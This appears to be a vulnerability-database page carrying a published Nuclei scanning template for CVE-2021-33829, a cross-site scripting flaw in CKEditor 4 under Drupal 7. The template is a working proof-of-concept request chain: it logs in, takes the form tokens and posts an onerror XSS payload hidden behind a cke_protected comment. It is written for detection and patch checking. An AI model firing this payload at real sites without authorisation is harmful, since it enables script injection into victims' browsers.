漏洞描述
CKEditor 4.14.0 through 4.16.x before 4.16.1 contains a reflected cross-site scripting caused by mishandling in comments, letting remote attackers inject executable JavaScript code, exploit requires victim to view malicious content.
CVE-2021-33829: Drupal 7 CKEditor XSS
PoC代码[已公开]
id: CVE-2021-33829
info:
name: Drupal 7 CKEditor XSS
author: 0x_Akoko
severity: medium
description: |
CKEditor 4.14.0 through 4.16.x before 4.16.1 contains a reflected cross-site scripting caused by mishandling in comments, letting remote attackers inject executable JavaScript code, exploit requires victim to view malicious content.
impact: |
Attackers can execute arbitrary JavaScript in the context of the victim's browser, leading to session hijacking or malicious actions.
remediation: |
Update to version 4.16.1 or later.
reference:
- https://checkmarx.com/blog/cve-2021-33829-stored-xss-vulnerability-discovered-in-ckeditor4-affects-widely-used-cms/
- https://www.drupal.org/sa-core-2021-003
- https://lists.debian.org/debian-lts-announce/2021/11/msg00007.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NYA354LJP47KCVJMTUO77ZCX3ZK42G3T/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-33829
cwe-id: CWE-79
epss-score: 0.47617
epss-percentile: 0.97591
cpe: cpe:2.3:a:ckeditor:ckeditor:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
shodan-query: cpe:"cpe:2.3:a:ckeditor:ckeditor"
tags: cve,cve2021,drupal,ckeditor,xss,authenticated
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
POST /user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name={{username}}&pass={{password}}&form_id=user_login&op=Log+in
matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains(tolower(all_headers), "set-cookie")'
condition: and
internal: true
extractors:
- type: kval
kval:
- set_cookie
internal: true
- raw:
- |
GET /node/add/page HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "form_build_id")'
- 'contains(body, "form_token")'
condition: and
internal: true
extractors:
- type: regex
name: form_build_id
part: body
regex:
- 'name="form_build_id" value="([^"]+)"'
group: 1
internal: true
- type: regex
name: form_token
part: body
regex:
- 'name="form_token" value="([^"]+)"'
group: 1
internal: true
- raw:
- |
POST /node/add/page HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
title=XSSTest&body[und][0][value]=<!--{cke_protected}--><img src=x onerror=alert(document.domain)>&body[und][0][format]=full_html&changed=&form_build_id={{form_build_id}}&form_token={{form_token}}&form_id=page_node_form&status=1&comment=1&name={{username}}&op=Save
matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains_all(tolower(header), "location: ","/node/")'
condition: and
internal: true
extractors:
- type: regex
name: node_url
part: header
regex:
- 'Location: (.*/node/[0-9]+)'
group: 1
internal: true
- raw:
- |
GET {{node_url}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '<!--{cke_protected}-->'
- 'alert(document.domain)'
condition: and
extractors:
- type: kval
name: node_url
kval:
- node_url
# digest: 490a00463044022063ecaab233b9386f5735e5f6bc5e250fd6e859c8dec199bc9bce0e797dfeb915022022a6dfe8be0cc37eb399796417c5aac383cbba392d98108d44655f3a2839c55f:922c64590222798bb761d5b6d8e72950